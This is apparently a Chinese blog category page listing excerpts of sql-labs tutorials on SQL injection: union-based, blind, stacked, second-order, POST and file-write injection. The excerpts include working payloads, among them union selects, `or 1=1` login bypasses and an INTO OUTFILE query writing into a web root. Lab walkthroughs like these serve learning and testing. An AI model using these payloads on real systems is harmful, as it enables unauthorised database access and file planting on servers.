sql注入
文章平均质量分 73
.
caiji2312
这个作者很懒,什么都没留下…
展开
-
MYSQL注入
注:MYSQL5.0以上为高版本,5.0以下为低版本MYSQL相关知识1.MYSQL数据库数据库A=网站A=数据库用户A表名 列名 数据数据库B=网站B=数据库用户B。。。。。。数据库C=网站C=数据库用户C。。。。。。2.在MYSQL5.0以上版本中,MYSQL存在一个自带数据库名为information_schema,它是一个存储记录有所有数据库名,表名,列名的数据库,也相当于可以通过查询它...原创 2021-11-19 21:40:30 · 554 阅读 · 0 评论 -
sql注入--各种数据库的注入+sqlmap使用
转载15.WEB漏洞——SQL注入之Oracle,MongoDB等注入 · 语雀 (yuque.com)转载 2021-12-08 16:51:28 · 245 阅读 · 0 评论 -
sql-labs 堆叠注入
转载:堆叠注入详解 - 渗透测试中心 - 博客园 (cnblogs.com)第三十八题id=1'说明为' '闭合id=1'--+id=1' or updatexml(1,concat(database()),1)--+id=1' union select 1,database(),2--+报错注入无效联合注入无效说明查询语句不行这时就可以用堆叠注入,因为堆叠注入可以执行任意类型的语句,并且它显示了字段名username和password例如id=1';..原创 2021-11-29 20:12:04 · 3053 阅读 · 0 评论 -
sql-labs 回显注入+盲注+dnslog注入
1.字符串:单引号'闭合判断注入类型id=1id=1 and 1=2id=1'说明为字符型注入id=-1' --+说明sql为单引号闭合id=1'order by 3正常id=1' order by 4报错判断字段数为3id=-1' union select 1,2,3 判断可利用字段数爆库:d=-1' union select 1,database(),3--+爆表:id=-1' union select 1,table_...原创 2021-11-27 14:36:16 · 3462 阅读 · 0 评论 -
sql-labs 文件读写
第7题:文件读写load file( '绝对路径') into outfile '绝对路径'id=1')) and 1=2--+id=1')) and 1=1--+说明为((' '))的闭合order by得到字段数为3上传文件id=-1')) union select 1,2,3 into outfile "E:\\phpstudy\\phpstudy_pro\\WWW\\sqli-labs-master\\wuhu.txt"--+上传成功这里就可...原创 2021-11-28 21:02:54 · 635 阅读 · 0 评论 -
sql-labs 二次注入
24.修改密码 update 二次注入1原理二次注入是存储型注入,可以理解为构造恶意数据存储在数据库后,恶意数据被读取并进入到了SQL查询语句所导致的注入。恶意数据插入到数据库时被处理的数据又被还原并存储在数据库中,当Web程序调用存储在数据库中的恶意数据并执行SQL查询时,就发生了SQL二次注入。详细点来讲,就是在第一次进行数据库插入数据的时候,仅仅只是使用了 addslashes 或者是借助 get_magic_quotes_gpc 对其中的特殊字符进行了转义,在写入数据库的时候还是保留了原来.原创 2021-11-28 21:01:55 · 262 阅读 · 0 评论 -
sql-labs post注入点 http头部 / update等语句
第11,题:请求方式11.post请求login登录 账户密码必是字符串类型随便输账户密码因为是post请求,查看页面源代码查看参数构造post请求,先看uname是否存在注入点 uname=asdas' or 1=1 #&passwd=&submit=Submit登陆成功再看下passwd是否存在注入点 uname=asdas&passwd=dfsdf' or 1=1#&submit=Submit也可以登录所以una...原创 2021-11-28 21:02:35 · 295 阅读 · 0 评论